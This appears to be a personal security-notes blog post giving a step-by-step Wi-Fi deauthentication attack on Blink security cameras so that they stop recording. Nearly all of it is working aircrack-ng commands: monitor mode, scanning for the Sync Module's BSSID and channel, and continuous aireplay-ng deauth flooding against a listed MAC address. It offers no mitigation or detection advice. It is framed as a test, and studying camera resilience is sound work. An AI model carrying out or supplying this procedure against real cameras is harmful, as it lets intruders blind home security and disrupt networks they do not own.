Security Systems and Notes

Notes for configurations and guides I've used.

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Disrupt IP Camera

In this test I wanted to see if Blink cameras are vulnerable to jamming and cause them to not record. The diagram of how the Deauth attack will take place is below. Once we find out the Mac address of the Sync Module we can send deauth packets at it using Airmon-ng and for the duration of the attack non of the cameras will be able to record or save its recordings. deauth



You’ll need the BSSID of the Blink Sync Module, I am on the same network and Identiffied the IP and MAC of it. Blink is a Amazon product so looking up this mac address brings back this info, Mac Address Lookup Site Amazon Technologies Inc. You can also use AngryIPScanner IP

Enable monitor mode

  1. Check for conflicting proccesses airmon-ng check kill
  2. Start the adapter in monitor mode sudo airmon-ng start wlan0 Monitor

Find target

  1. Run airodump-ng -w output_scan wlan0

    Looking in the STATION section for the Mac address, we can match the corrisponding ESSID, to find it easier we can output to a file using -w argument. Open the output file. BSSID

  2. Locate the channel

    By checking the top part of the output and match the newley found BSSID. SSID

  3. Gathered info so far:
blink-sync-module 74:EC:B2:41:4B:61 E8:9F:80:12:5C:77 11

Attack target

  1. Switch channel sudo iwconfig wlan0 channel 11
  2. Send Deauth packets sudo aireplay-ng -0 0 -a E8:9F:80:12:5C:77 wlan0

    This will continuasly block the packets using the ‘0’ argument but we can set a timer for how many packets are being sent.
